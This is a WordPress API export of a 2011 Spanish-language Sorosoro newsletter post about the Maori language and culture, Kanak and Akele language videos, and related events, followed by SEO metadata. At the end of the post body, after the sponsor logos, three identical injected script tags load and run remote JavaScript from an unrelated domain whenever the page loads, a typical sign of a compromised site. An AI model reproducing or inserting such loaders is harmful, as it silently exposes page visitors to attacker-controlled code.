{"id":59356,"date":"2011-10-17T10:18:06","date_gmt":"2011-10-17T08:18:06","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=59356"},"modified":"2025-10-21T22:17:55","modified_gmt":"2025-10-21T20:17:55","slug":"sorosoro-14-de-octubre-de-2011","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/","title":{"rendered":"Sorosoro, 14 de octubre de 2011 <br\/><span style=\"font-size: 20px\">  \u00a1Los maor\u00edes en el cartel!<\/span>"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"color: #939523;\"><strong>Agenda<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">En el museo del quai Branly, en Par\u00eds, se puede admirar desde el 4 de octubre hasta el 22 de enero, la exposici\u00f3n <em><strong>Maor\u00ed, sus tesoros tienen un alma<\/strong><\/em>, rica con 250 obras. Es una ocasi\u00f3n \u00fanica para descubrir la cultura maor\u00ed vista por los maor\u00edes.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/4-de-octubre-de-2011-22-de-enero-de-2012-exposicion-maori-en-el-museo-de-quai-branly-paris\">Leer el art\u00edculo<\/a>\u2026<\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #939523;\"><strong>Actualidad<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Y tambi\u00e9n en el Museo del quai Branly se ha hecho el anuncio a las autoridades de Nueva-Zelanda de la pr\u00f3xima restituci\u00f3n (en enero de 2012) de todas las <strong>cabezas de los guerreros maor\u00edes<\/strong> aun presentes en el territorio franc\u00e9s.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/3-de-octubre-de-2011-francia-restituira-todas-las-cabezas-de-los-guerreros-maories-a-nueva-zelanda-en-enero-de-2012\">Leer el art\u00edculo<\/a>\u2026<\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #939523;\"><strong>Blog<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Pero m\u00e1s all\u00e1 de los objetos del museo, la cultura maor\u00ed es tambi\u00e9n una lengua que fue hablada en 1930 por el 97 % de su poblaci\u00f3n, pero durante decenios ha conocido una decadencia espectacular. Actualmente, la lengua ha encontrado progresivamente su lugar, en particular en el sistema educativo, como nos lo ha descrito el profesor <strong>Richard Hill<\/strong>.<\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/blog.sorosoro.org\/es\/la-ensenanza-en-maori-en-nueva-zelanda-su-progreso-y-lo-que-esta-en-juego\">Leer el blog<\/a>\u2026<\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #939523;\"><strong>Soropedia<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Y para completar este panorama, qu\u00e9 mejor que una <strong>ficha descriptiva de la lengua maor\u00ed<\/strong>, rica en informaciones y lazos para saber m\u00e1s.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/el-maori\">Leer la ficha<\/a>\u2026<\/p>\n<p style=\"text-align: justify;\">\n<h5 style=\"text-align: justify;\"><span style=\"color:#800104;\">Pero tambi\u00e9n los v\u00eddeos<\/span><\/h5>\n<p style=\"text-align: justify;\"><span style=\"color: #939523;\"><strong>En los kanak de Nueva-Caledonia<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Nosotros encontramos a <strong>Marie-Ad\u00e8le Jor\u00e9di\u00e9<\/strong>, profesora de lengua <strong>x\u00e2r\u00e2c\u00f9\u00f9<\/strong>, en plena sesi\u00f3n de aprendizaje con los ni\u00f1os de la clase de \u201cBb lectura\u201d. Un v\u00eddeo realizado en colaboraci\u00f3n con la <a href=\"http:\/\/www.alk.gouv.nc\/portal\/page\/portal\/alk\/\" target=\"_blank\">Academia de las Lenguas Kanak (ALK)<\/a>.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/marie-adele-joredie-y-los-bb-lectura-en-lengua-xaracuu\">Ver el v\u00eddeo<\/a>\u2026<\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #939523;\"><strong>En espa\u00f1ol, en los akel\u00e9 de Gab\u00f3n<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Esta semana, para nuestros amigos hispanohablantes, un florilegio de v\u00eddeos musicales en <a href=\"https:\/\/www.sorosoro.org\/es\/videos-en-la-lengua-akele-gabon\"><strong>lengua akel\u00e9<\/strong><\/a>: cantos de pesca, cantos rituales, cancionces de cuna, y una v\u00eddeo sobre la fabricaci\u00f3n y el uso ritual del <em>ngongo<\/em>, el arco musical de los Ak\u00e9l\u00e9\u2026 \u00a1Todo un programa!<\/p>\n<p style=\"text-align: justify;\">\n<h5 style=\"text-align: justify;\"><span style=\"color:#800104;\">Y algunas otras informaciones<\/span><\/h5>\n<p style=\"text-align: justify;\"><strong>10-11 octubre de 2011<\/strong>: una serie de art\u00edculos sobre la lengua amazigh en la prensa argelina.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\">Leer el art\u00edculo<\/a>\u2026<\/p>\n<p style=\"text-align: justify;\"><strong>30 de octubre \u2013 2 de noviembre<\/strong>: simposio \u00ab\u00a0Ense\u00f1ar y aprender las lenguas ind\u00edgenas de Am\u00e9rica latina\u00a0\u00bb en Notre Dame en la Indiana, en los Estados Unidos.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/30-de-octubre-2-de-noviembre-de-2011-simposio-%e2%80%9censenanza-y-aprendizaje-de-lenguas-indigenas-de-america-latina%e2%80%9d-indiana-usa\">Leer el art\u00edculo<\/a>\u2026<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Y no olvide que esperamos sus numerosas traducciones de la palabra \u00ab<a href=\"https:\/\/www.sorosoro.org\/es\/cumpleanos\"><strong>cumplea\u00f1os<\/strong><\/a>\u00bb, en todas sus lenguas.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: center;\">Con el apoyo de<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" title=\"LogoFondationChirac\" src=\"..\/wp-content\/uploads\/LogoFondationChirac2-280x300.jpg\" alt=\"LogoFondationChirac\" width=\"75\" height=\"82\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-56970\" title=\"logo_FondationOrange-es\" src=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg\" alt=\"logo_FondationOrange-es\" width=\"168\" height=\"68\" \/><\/p>\n<p style=\"text-align: justify;\">\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Agenda En el museo del quai Branly, en Par\u00eds, se puede admirar desde el 4 de octubre hasta el 22 de enero, la exposici\u00f3n Maor\u00ed, sus tesoros tienen un alma, rica con 250 obras. Es una ocasi\u00f3n \u00fanica para descubrir la cultura maor\u00ed vista por los maor\u00edes. Leer el art\u00edculo\u2026 Actualidad Y tambi\u00e9n en el [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59356","post","type-post","status-publish","format-standard","hentry","category-actualidades-de-sorosoro"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sorosoro, 14 de octubre de 2011  \u00a1Los maor\u00edes en el cartel! - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sorosoro, 14 de octubre de 2011  \u00a1Los maor\u00edes en el cartel! - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"Agenda En el museo del quai Branly, en Par\u00eds, se puede admirar desde el 4 de octubre hasta el 22 de enero, la exposici\u00f3n Maor\u00ed, sus tesoros tienen un alma, rica con 250 obras. Es una ocasi\u00f3n \u00fanica para descubrir la cultura maor\u00ed vista por los maor\u00edes. Leer el art\u00edculo\u2026 Actualidad Y tambi\u00e9n en el [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-10-17T08:18:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:17:55+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"Sorosoro, 14 de octubre de 2011 \u00a1Los maor\u00edes en el cartel!\",\"datePublished\":\"2011-10-17T08:18:06+00:00\",\"dateModified\":\"2025-10-21T20:17:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/\"},\"wordCount\":392,\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg\",\"articleSection\":[\"Novedades en Sorosoro\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/\",\"name\":\"Sorosoro, 14 de octubre de 2011 \u00a1Los maor\u00edes en el cartel! - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg\",\"datePublished\":\"2011-10-17T08:18:06+00:00\",\"dateModified\":\"2025-10-21T20:17:55+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#primaryimage\",\"url\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg\",\"contentUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sorosoro, 14 de octubre de 2011 \u00a1Los maor\u00edes en el cartel!\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sorosoro, 14 de octubre de 2011  \u00a1Los maor\u00edes en el cartel! - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/","og_locale":"es_ES","og_type":"article","og_title":"Sorosoro, 14 de octubre de 2011  \u00a1Los maor\u00edes en el cartel! - Sorosoro","og_description":"Agenda En el museo del quai Branly, en Par\u00eds, se puede admirar desde el 4 de octubre hasta el 22 de enero, la exposici\u00f3n Maor\u00ed, sus tesoros tienen un alma, rica con 250 obras. Es una ocasi\u00f3n \u00fanica para descubrir la cultura maor\u00ed vista por los maor\u00edes. Leer el art\u00edculo\u2026 Actualidad Y tambi\u00e9n en el [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/","og_site_name":"Sorosoro","article_published_time":"2011-10-17T08:18:06+00:00","article_modified_time":"2025-10-21T20:17:55+00:00","og_image":[{"url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg","type":"","width":"","height":""}],"author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"Sorosoro, 14 de octubre de 2011 \u00a1Los maor\u00edes en el cartel!","datePublished":"2011-10-17T08:18:06+00:00","dateModified":"2025-10-21T20:17:55+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/"},"wordCount":392,"image":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg","articleSection":["Novedades en Sorosoro"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/","name":"Sorosoro, 14 de octubre de 2011 \u00a1Los maor\u00edes en el cartel! - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#primaryimage"},"image":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg","datePublished":"2011-10-17T08:18:06+00:00","dateModified":"2025-10-21T20:17:55+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#primaryimage","url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg","contentUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/logo_FondationOrange-es.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/sorosoro-14-de-octubre-de-2011\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"Sorosoro, 14 de octubre de 2011 \u00a1Los maor\u00edes en el cartel!"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/59356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=59356"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/59356\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=59356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=59356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=59356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}